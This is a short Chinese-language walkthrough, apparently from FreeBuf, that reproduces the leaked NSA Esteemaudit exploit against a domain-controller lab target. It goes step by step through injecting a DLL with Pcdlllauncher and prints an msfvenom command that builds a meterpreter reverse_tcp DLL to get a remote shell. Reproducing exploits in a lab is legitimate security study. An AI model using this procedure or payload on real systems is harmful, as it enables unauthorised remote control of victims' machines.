ShadowBroker釋放的NSA工具中Esteemaudit漏洞復現過程
近日臭名昭著的方程式組織工具包再次被公開,TheShadowBrokers在steemit.com博客上提供了相關消息。以下是其中Esteemaudit漏洞復現過程。
前期準備
靶機環境
需要域控環境
Esteemaudit漏洞復現過程
use Esteemaudit使用漏洞模塊
設置目標IP和埠
然後基本上默認,基本配置如下:
運行後再進行配置。
然後基本上選擇相對應的設置,CallbackIp填自己的,埠隨便
然後配置DLL。注意這裡默認路徑基本上是不對,找到自己對應的文件路徑進行修改:
然後基本上配置如下
可以運行了
利用Pcdlllauncher注入DLL
使用Pcdlllauncher
use Pcdlllauncher
然後生成用於反彈shell的dll payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.129 LPORT=4444 -f dll >win.dll
然後進行配置
找到自己對應的文件路徑修改
要注入的惡意DLL文件路徑
然後基本上默認,運行就行了,成功注入
查看Metasploit,成功返回shell
*本文作者:zusheng,轉載請註明來自FreeBuf.COM
※800元打造物理解析度2K投影儀全攻略
※技術流掛馬揭秘:Flash廣告與Sage2.0勒索軟體的「黑金搭檔」
※如何使用加密的Payload來識別並利用SQL注入漏洞
※影子經紀人曝光的NSA大殺器可能與Stuxnet相關
TAG:FreeBuf |
※PowerGhost:集PowerShell和EternalBlue於一身的多功能挖礦工具
※TensorFlow新工具 AutoGraph
※MySQL 下 perror 工具查看 System Error Code 信息
※Adobe收購3D編輯工具Substance開發商Allegorithmic
※iOS滲透測試工具Part 1:App Decryption以及class-dump
※Process-Forest-Window進程日誌分析工具;python版的BloodHound
※Proofpoint:新的Office文檔漏洞利用工具包ThreadKit已被發現
※場景文字圖像增廣工具 Scene Text Image Transformer
※微軟買下性能分析工具Windows Performance Analyzer
※Google發布了一套名為Material Theming的新工具
※實現高速點擊的 Android Monkey 自動化工具 fastmonkey-代號 Maxim
※Salesforce開源構建Einstein AI模型的工具
※跳一跳工具py輔助 Python提示No module named sklearn 解決方法
※WPSeku-Wordpress漏洞掃描工具
※Nvidia 圖片風格轉換工具——FastPhotoStyle
※clrinject:向CLR Runtimes和AppDomain中注入代碼的工具
※Aqua推出開源Kubernetes滲透測試工具Kube-hunter
※攝影師必備—Photoshop後期調色工具Camera Raw
※Windows-Kernel-Explorer : 內核研究工具
※StreetLight Data提供Traffic Diagnostics工具 優化城市交通擁堵及規劃方案